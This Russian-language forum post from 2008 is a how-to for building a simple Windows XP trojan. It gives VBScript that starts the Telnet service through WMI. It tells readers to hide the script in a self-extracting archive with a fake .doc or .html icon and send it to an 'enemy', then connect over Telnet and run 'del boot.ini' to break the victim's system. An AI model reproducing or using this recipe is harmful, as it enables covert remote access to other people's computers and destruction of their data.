Так, для начала определимся, что нам будет нужно, и
постараемся обойтись минимальным набором. Если ты в курсе, в
WinXP существует служба с названием TlntSvr. Как ты думаешь,
что это за фишка?
Раскрою огромнейший сверхсуперсекрет: это служба Телнета! Что
такое Телнет и как им пользоваться, можно узнать, если зайти
в Центр справки и поддержки, который встроен у тебя в систему
(при условии, что ты поклонник дяди Билли и у тебя не Пингвин)
Или сделать Пуск - Выполнить - cmd.exe, в чёрном окошке вбить
telnet /? и читать, читать и читать!
После того как ты запомнишь основные команды телнета
(может, ты уже их знаешь? Тогда супер!), можно идти дальше.
Думаешь, зачем я всё это тебе рассказываю? А затем,
что этот самый телнет может очень нам помочь в деле удалённого
управления 
Ну и что с того, что эта служба по умолчанию
отключена? А мы возьмём и включим её. К сожалению, абсолютно
удалённо это сделать довольно нелегко, поэтому нам необходимо
нечто, запускающее эту службу.
III. Таблетки не помогут...
...потому что наш трой - это НЕ вредоносная программа
как таковая. В ней вообще нет ни строчки вредоносного кода! Это
обычная команда запуска системной службы. Вот только возможные
последствия могут быть крайне опасными 
Смотря как воспользоваться этим методом...
Итак, нам необходимы следующие инструменты:
- текстовый редактор (подойдёт Блокнот)
- немного знаний Visual Basic Script
- знание синтаксиса команд Telnet
- знание основных принципов организации операционной системы
WinXP, прикладных программ
- знание основных принципов построения и функционирования
локальных сетей и Интернет
Для начала этого хватит. Теперь открываем Блокнот и
вбиваем туда следующее:
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colServiceList = objWMIService.ExecQuery _
("Select * from Win32_Service where Name='TlntSvr'")
For Each objService in colServiceList
errReturn = objService.StartService()
Next
Обо всём по порядку. Первая строка отвечает за то,
чтобы скрипт запустился на том компе, где его открыли.
Остальные варианты предназначены для контроллера домена AD
и не существенны в данной ситуации.
Вторая строка - это обращение к WMI - Windows
Management Instrumentation, или к Набору Инструментария
управления Виндовсом Очень нужная штука, кстати, и сейчас
мы это докажем 
Третья строка нас отправляет с вопросом к WMI, типа,
а где тут у нас службы находятся? ))
На что WMI отвечает, что все службы тута, выбирай любую. Вот
мы и выбираем службу TlntSvr.
Теперь осталось запустить выбранную службу:
objService.StartService()
IV.
Зачем мы всё это делали? Затем, что теперь на той
машине, где сработал этот скрипт, есть очень интересный порт 23,
на котором висит не менее интересная служба ТЕЛНЕТ! Если,
конечно, ты понимаешь, к чему это я.
Собственно, теперь можно сохранить этот код из Блокнота
с расширением *.vbs, засунуть в самораспаковывающийся архив (если
не знаешь, что это такое - юзай справку WinRAR) и смело засылать
недругу с иконкой *.doc или *.html файла. После чего Пуск -
Выполнить - cmd.exe, там вбиваем telnet 123.45.67.89 и привет,
мы в корне диска удалённой машины. А дальше уже твоя фантазия )))
Самая оригинальная команда в этом случае - del boot.ini.
И пусть потом перезагрузится...
Удачи!
Отредактировано $EG@ (2008-05-19 00:03:17)
